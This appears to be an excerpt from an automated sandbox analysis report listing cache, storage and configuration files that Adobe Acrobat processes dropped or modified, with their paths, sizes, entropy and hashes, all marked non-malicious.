MD5: | 99B11B646344ACBA2E37D1A19CC2B0B2 |
SHA1: | 4462456751C62F82B9BE054A9C3D3DA97ACA4840 |
SHA-256: | CB7C1E1F1A4ACBCA6EB351BA38DB6B3996894D102258FF89C9CDE1E88028FDF0 |
SHA-512: | 739D9E2AAD117F7D55C1E6724F4701FEE8DFF2C1AFC4C54D538412448B5D7E2022063C16C44B8CBB632309E15DBE5BC616458AD932F29EC9170B400D74319034 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 290 |
Entropy (8bit): | 5.092828219483291 |
Encrypted: | false |
SSDEEP: | 6:iO4KSM+q2PFi2nKuAl9OmbnIFUtSMXZmwsiMVkwOFi2nKuAl9OmbjLJ:79/+vdZHAahFUtVX/EV5wZHAaSJ |
MD5: | 8FBCB841B1B2873F7BD124FC232F20EC |
SHA1: | 305655CD966498C4DCEF74FE62176C7EA6482A8D |
SHA-256: | 314A00AE3CDDF164535D03E084A594CEE54081543055B0DF3F412FF71724FF2D |
SHA-512: | C4626475F9D744BA6675C6313FD1F61C9E4C72A3DCABAA955F313A3EEB417CD2DCEAF5BAB1C9A3EBCB1D5AE8EECA32F85D7086A22E7B7847192395BB4605E22B |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 290 |
Entropy (8bit): | 5.092828219483291 |
Encrypted: | false |
SSDEEP: | 6:iO4KSM+q2PFi2nKuAl9OmbnIFUtSMXZmwsiMVkwOFi2nKuAl9OmbjLJ:79/+vdZHAahFUtVX/EV5wZHAaSJ |
MD5: | 8FBCB841B1B2873F7BD124FC232F20EC |
SHA1: | 305655CD966498C4DCEF74FE62176C7EA6482A8D |
SHA-256: | 314A00AE3CDDF164535D03E084A594CEE54081543055B0DF3F412FF71724FF2D |
SHA-512: | C4626475F9D744BA6675C6313FD1F61C9E4C72A3DCABAA955F313A3EEB417CD2DCEAF5BAB1C9A3EBCB1D5AE8EECA32F85D7086A22E7B7847192395BB4605E22B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 334 |
Entropy (8bit): | 5.102067853945049 |
Encrypted: | false |
SSDEEP: | 6:iO4fX4q2PFi2nKuAl9Ombzo2jMGIFUtSuJZmwsFXDkwOFi2nKuAl9Ombzo2jMmLJ:7zvdZHAa8uFUtx/OT5wZHAa8RJ |
MD5: | E269EC89AC0E469B705864762F9878A2 |
SHA1: | CAD99321EB9C21A4424CDEC4B5AF15F32DA3D116 |
SHA-256: | D908B76798437F71B49699BE1576B72869CE012B878826C8778544C4DBCBD141 |
SHA-512: | CEC64227D04E49D378954051FA122D8E1F34D0494BB34F0D7F009457C4DA6BA52316E4431315616EB9330E1E228385A446E748B1DAAB34A86D72DEED71C0DC86 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 334 |
Entropy (8bit): | 5.102067853945049 |
Encrypted: | false |
SSDEEP: | 6:iO4fX4q2PFi2nKuAl9Ombzo2jMGIFUtSuJZmwsFXDkwOFi2nKuAl9Ombzo2jMmLJ:7zvdZHAa8uFUtx/OT5wZHAa8RJ |
MD5: | E269EC89AC0E469B705864762F9878A2 |
SHA1: | CAD99321EB9C21A4424CDEC4B5AF15F32DA3D116 |
SHA-256: | D908B76798437F71B49699BE1576B72869CE012B878826C8778544C4DBCBD141 |
SHA-512: | CEC64227D04E49D378954051FA122D8E1F34D0494BB34F0D7F009457C4DA6BA52316E4431315616EB9330E1E228385A446E748B1DAAB34A86D72DEED71C0DC86 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 476 |
Entropy (8bit): | 4.972089615397816 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sq8VSsBdOg2H8caq3QYiubpP7E4T3y:Y2sRdshVXdMH/3QYhbd7nby |
MD5: | BC1E488C2904883FD6F67C08422DDADE |
SHA1: | C65A935A8C31DFE58AB6B35AD91BD7C689F19473 |
SHA-256: | 1013F2F230BCA5D8CE01E3AC7F8D92EAFD4A6B07B4DA0E30B1692F9DBBC58F88 |
SHA-512: | 43322AA5CA2B448FC076AB034B9928B0952BD7F1994725AB92E27417D25DC16237EB7E33A401C9FE146D9970B4B5987A13F8E297633D6F1BAD5CC22BC9CEF0E7 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\d65fa2d9-91fd-4a4f-bc5e-f63944419bbe.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 476 |
Entropy (8bit): | 4.972089615397816 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sq8VSsBdOg2H8caq3QYiubpP7E4T3y:Y2sRdshVXdMH/3QYhbd7nby |
MD5: | BC1E488C2904883FD6F67C08422DDADE |
SHA1: | C65A935A8C31DFE58AB6B35AD91BD7C689F19473 |
SHA-256: | 1013F2F230BCA5D8CE01E3AC7F8D92EAFD4A6B07B4DA0E30B1692F9DBBC58F88 |
SHA-512: | 43322AA5CA2B448FC076AB034B9928B0952BD7F1994725AB92E27417D25DC16237EB7E33A401C9FE146D9970B4B5987A13F8E297633D6F1BAD5CC22BC9CEF0E7 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3878 |
Entropy (8bit): | 5.232648427767605 |
Encrypted: | false |
SSDEEP: | 96:wshFT0h7cA4YC2EVPCqY35NEmNOYcGPtqKYSEVshVPfS:wshFT0h7cZb2EVKZPEANcGIK5EVsPPfS |
MD5: | 402C05044E90CF6C133420FB4D79A975 |
SHA1: | AEA38CF63E0713A935E5741E7E26156CEFEEC0CB |
SHA-256: | E2E0873EFEF0D043D07709559881EEA1136B1B08E245524EE7F18F3000FE2988 |
SHA-512: | C66F6E74F2A46EB5CAF7DF986DA1971F648D119E0459D81A788AB9A8799353C99A92283F9D0DF55FEADD3E1B1CD6C75129296617BE788CA4586FBF2036B68EFA |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 322 |
Entropy (8bit): | 5.110714705088763 |
Encrypted: | false |
SSDEEP: | 6:iO4pH34q2PFi2nKuAl9OmbzNMxIFUtSOABvJZmwsS/vDkwOFi2nKuAl9OmbzNMFd:7OHIvdZHAa8jFUtpI/N5wZHAa84J |
MD5: | 36AD555D2FDE21A01459DA4EED36A1CC |
SHA1: | 031A7AD47928911EC93831B3D2FB2C65A29C8592 |
SHA-256: | A49798ABA98279A0EBF9D74B78B90893720FF6CD5A209A8574BF2F26CFBD294D |
SHA-512: | A95599230A28C19EA5F7DAD0AB2CE9C400CCC585F3494F0ED5CA469463082BA751885A21052BFB814551B83B66F89D02B222F59948F39026F125C1AE74DB0774 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 322 |
Entropy (8bit): | 5.110714705088763 |
Encrypted: | false |
SSDEEP: | 6:iO4pH34q2PFi2nKuAl9OmbzNMxIFUtSOABvJZmwsS/vDkwOFi2nKuAl9OmbzNMFd:7OHIvdZHAa8jFUtpI/N5wZHAa84J |
MD5: | 36AD555D2FDE21A01459DA4EED36A1CC |
SHA1: | 031A7AD47928911EC93831B3D2FB2C65A29C8592 |
SHA-256: | A49798ABA98279A0EBF9D74B78B90893720FF6CD5A209A8574BF2F26CFBD294D |
SHA-512: | A95599230A28C19EA5F7DAD0AB2CE9C400CCC585F3494F0ED5CA469463082BA751885A21052BFB814551B83B66F89D02B222F59948F39026F125C1AE74DB0774 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 86016 |
Entropy (8bit): | 4.438458999834889 |
Encrypted: | false |
SSDEEP: | 384:Sewci5GyiBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:XiurVgazUpUTTGt |
MD5: | 07C413740AACFCE4031D292557A2965F |
SHA1: | 867BFF61B692A709228E02DCA3FBAE6F1CF0D536 |
SHA-256: | BB5497E3303098DE63F6E891DDD273FA073C9A727355CCE409287F507DD8AFF2 |
SHA-512: | 537D1D346F657E89DA5175BAC0F7B66C33AD3E759BEFFD2DB8FB054665B9268C492952B02E2183955086E03C859A604C63527DF2946BBF2E343A9BBED56EB02F |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.213466867228965 |
Encrypted: | false |
SSDEEP: | 24:7+t0Rk6wKfqLrzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9MT:7MNWfqvmFTIF3XmHjBoGGR+jMz+Lhq |
MD5: | 2AB1E6B669F5857DC1D0BBE9F90B98FE |
SHA1: | 8B4A1183034D989C1434E50482BB5DE5F00C22C2 |
SHA-256: | 53EF89C81DE208B3A27C38A1C0249E5E87B5FED72900EE3D7FA0B8576FDE69F9 |
SHA-512: | 55F612615D0382CFA5A475A7B5C129BD589BB1EA99219C79A5288CB760010A519C160E8BB76132BB6BFB646BCFC3D17C2F43E20299C2002F238A53D598797E84 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 71954 |
Entropy (8bit): | 7.996617769952133 |
Encrypted: | true |
SSDEEP: | 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ |
MD5: | 49AEBF8CBD62D92AC215B2923FB1B9F5 |
SHA1: | 1723BE06719828DDA65AD804298D0431F6AFF976 |
SHA-256: | B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F |
SHA-512: | BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.7647458239154146 |
Encrypted: | false |
SSDEEP: | 3:kkFkljnpEttfllXlE/HT8klDXNNX8RolJuRdxLlGB9lQRYwpDdt:kKVeT8sDdNMa8RdWBwRd |
MD5: | C24880B3B34B1CC2BC90BEFC09C62096 |
SHA1: | C83C13611ED8ACAD1D2BD1CFF4584383D8C410F1 |
SHA-256: | CDAF16FB85E497E5C9D6867F83BC411DBDA49E156A18E50F05B997CFEDB3127F |
SHA-512: | 19A430D3329DC1506E1512FD928B7A94232C8F1CCF403217250B3871C7476E759C9D2B460CAA5DE32A59C22BFF7C2B2BB143B968ED8991A024CFB9C17A6F3C74 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 328 |
Entropy (8bit): | 3.139179158420051 |
Encrypted: | false |
SSDEEP: | 6:kK9L9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:FiDnLNkPlE99SNxAhUe/3 |
MD5: | 543A6DD45870F03607766CE5681EA79F |
SHA1: | EB18362C23C93FEFE0153E75B4CBE6442F62AF49 |
SHA-256: | 219B270E50822DD27BD85E3C6B272E9D10F7E8D335891B80F9678F0A0F77389E |
SHA-512: | F5F8D94724BC504611FE72443E75BFAFDE7D946B3292F5F7A405A76EFA2569D1C0D64D88FE25F7D66E0B3A8F864CE9BAC5643130C8B16330F89C0E1026C8D1B9 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.3826170458350235 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX4W4AL9YUXjb24kF0YJSjqoAvJM3g98kUwPeUkwRe9:YvXKX4W4ApYUTbdnGMbLUkee9 |
MD5: | 87AEA2B5F80A4CD72E07F64AFCDBC2F0 |
SHA1: | 8FCA4D9621081DB53B15081C6299BFF26E836531 |
SHA-256: | A90098410DF3B10E5A64456F98AC1EDAEACD03141CD66D5403607DA058CA6427 |
SHA-512: | 376D7EAD65603613AAFED09756B8F9E4C47F47D2ADDEE6085929C4D057B18BDDCFFFD29361313557A084DA602F299201E60FB9CE58A39026E205DCA1CBB7F71D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.318477212300071 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX4W4AL9YUXjb24kF0YJSjqoAvJfBoTfXpnrPeUkwRe9:YvXKX4W4ApYUTbdnGWTfXcUkee9 |
MD5: | AD3C8B3B0FBEA97D2B6A5558C9892180 |
SHA1: | 000F1DDBD473D1285D3138CFE292216416385D1F |
SHA-256: | D51B02DA3D52417B69B2D63ECEA8CB306B23FD866CD3B895DBB4594041E22981 |
SHA-512: | 0BE5C7BE554D856D7A8ACC069CDCE9775D98B61BF843805EE4EB17F7E2763434F8E78BEAD1CA5EA4A9D27BB99C24E56FA94FBFCCF8CE6181CA3F8E3AAF3D27D7 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.297745006214741 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX4W4AL9YUXjb24kF0YJSjqoAvJfBD2G6UpnrPeUkwRe9:YvXKX4W4ApYUTbdnGR22cUkee9 |
MD5: | 5F953FBD5C68CE70B6634C74C44D1CA0 |
SHA1: | 0CC53A256CAD61724FF0E0BCBA5BB525F23BD0BA |
SHA-256: | F4130AD701DB6072C20D74ACE9B7F2340A3DA31C7352B5A0E06492D044D0156A |
SHA-512: | 081C842BADB9836AD6898EA64304B9822277C13E36BAD0723F47D7C16599A04F2EC2C8CA579FD20E939F3F1DE3FDEED9F8482835D4D568667B07F043C86929E3 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.357571322724589 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX4W4AL9YUXjb24kF0YJSjqoAvJfPmwrPeUkwRe9:YvXKX4W4ApYUTbdnGH56Ukee9 |
MD5: | A14EDBACE2543D2AEC95DE8237441458 |
SHA1: | EF0793F72CDB83002108376EB98581BCCF3038C0 |
SHA-256: | 3A7E689D38D6BFE8F2435952C07F244DD839599022CD55AFDE27CD18931C3B12 |
SHA-512: | 8B25D62007874316E88EB36899F9347E08781C98F97BC56444B2316527897BB80FE80D8A901AE36BEB31571FFF91A6AA813A4FEEA2CFA60AF645ED85A0B2437B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.685229567722513 |
Encrypted: | false |
SSDEEP: | 24:Yv6X4WkUX6pLgE9cQx8LennAvzBvkn0RCmK8czOCCSwx:YvJWkw6hgy6SAFv5Ah8cv/wx |
MD5: | 04C8020D8C22E513E46B812B6DAC3EB6 |
SHA1: | 9546E8428F9C2C85EAA72F1C302D29441381C431 |
SHA-256: | 8A94BB3C9046DAA66111B228442EC0E57F705A652805202E590344B4429A5284 |
SHA-512: | C213C3CC0A75E81CC3CB52E70E169D9A91133D3988A28E59F6A124EB665D86F06C4F9E7E00E0D3C9EDC90904AFAD22817367E5CC53F51AA976F6D64355BFE164 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.29596614679152 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX4W4AL9YUXjb24kF0YJSjqoAvJf8dPeUkwRe9:YvXKX4W4ApYUTbdnGU8Ukee9 |
MD5: | F4FAE9A50F69F6D89A6D95CABC6A622F |
SHA1: | 310E14EB31145A9C7E6ABE20776985E9F9C3F8F5 |
SHA-256: | 378C7FCE3C0B3501997177C4346D1107923DC0A81F8127110EC1F25C87F9DFE5 |
SHA-512: | EF48452E61C0712D16C07B8449ECD471423CA278E157FB5328A136FBC195861BB78365EEEAECA1EF37457ED04C586DFBF5974B764F6F17A1F72C3D9CE048D4C8 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.2980762185216115 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX4W4AL9YUXjb24kF0YJSjqoAvJfQ1rPeUkwRe9:YvXKX4W4ApYUTbdnGY16Ukee9 |
MD5: | 4DE93487036CEBEB0AD3CC9EAE7FD89F |
SHA1: | A7F7BA478302B69CCB8020E2A866D94F62B21883 |
SHA-256: | 676C5B08C9F0920B50EA982539EC54A66F1BEB67088058DD5DE5B7B348207243 |
SHA-512: | 9BDF97E49DCB7B99E42BD220AA00D8B7D1A77547EDF2E6FE61EE47915A1CD739EF2C5622B011F722855B07DCCD8151B6CE0259119009065D70A7713D88482E60 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.307170999461794 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX4W4AL9YUXjb24kF0YJSjqoAvJfFldPeUkwRe9:YvXKX4W4ApYUTbdnGz8Ukee9 |
MD5: | B2844D6B2FC444B67170A85AFC731438 |
SHA1: | 89239DD1C1608C7483B2AC2162CA957B71100C83 |
SHA-256: | 6646401BF607A1B216896EF35BA4AFA25AD6CFB29B53577120396E17D20E964F |
SHA-512: | F495CD45D00FB01A75E05A731AD88E4FE3148846DB5EE46CC069909337E1C9CF6B9B3B8CFFFAE5DE56EF847357A931B3F42E4B3946A8A5E79784C43D770FDBA5 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.321706387203536 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX4W4AL9YUXjb24kF0YJSjqoAvJfzdPeUkwRe9:YvXKX4W4ApYUTbdnGb8Ukee9 |
MD5: | 8E139643298D7479549EF8AD6EE35206 |
SHA1: | 79ACA96F17EF8237DD5D8EA6D99BE52F97D6D2FA |
SHA-256: | 143A9BA55376FD3450A8E58B334FC21CD3EFD5FC73E25199202548B5B276FA3B |
SHA-512: | E1034F67B81813CB160C0C7210BB25F9B50D1CE2B9DD961093D13019B4943FBA05EFB6EE7ED81403345508A39616A178A7790F47D97AB635862C20A8CF2AB5BA |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.302104950649402 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX4W4AL9YUXjb24kF0YJSjqoAvJfYdPeUkwRe9:YvXKX4W4ApYUTbdnGg8Ukee9 |
MD5: | 708A73405A29E54A47AFF949829D38DB |
SHA1: | 3B8FE56937218261322D8E898B735CD2593852B8 |
SHA-256: | 7CA2FB65C8F64C20FF9747AF66E856A7972CDD107659D8A0A2A2082A9C5895AD |
SHA-512: | 865128A3FC2087810EA24ACEF7F3EC371081CD3FAE7B82DEDD50A4DFFB90A40552069582BFEDF5CABCD2D91D41A7EFE4EB6C58EE6317C600E2516C2F94710704 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.288773736083042 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX4W4AL9YUXjb24kF0YJSjqoAvJf+dPeUkwRe9:YvXKX4W4ApYUTbdnG28Ukee9 |
MD5: | 1728C5686AD27BD18E23269921536360 |
SHA1: | D0FC0C23D8F64E4DA09F7FA2252D3D0A06D28BB7 |
SHA-256: | 615DC43319999E633B480730BC1C42F112245A9BED84519D9F49D3E239472614 |
SHA-512: | 9667DD624A226AEBDF6A64BDAF06A488A55BB1319144E84EB3A2054E12A19A34471E796B481606B3E7CFC807626635A9313A48152AB470E1351334208E3358EC |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.285637581308492 |
Encrypted: | false |
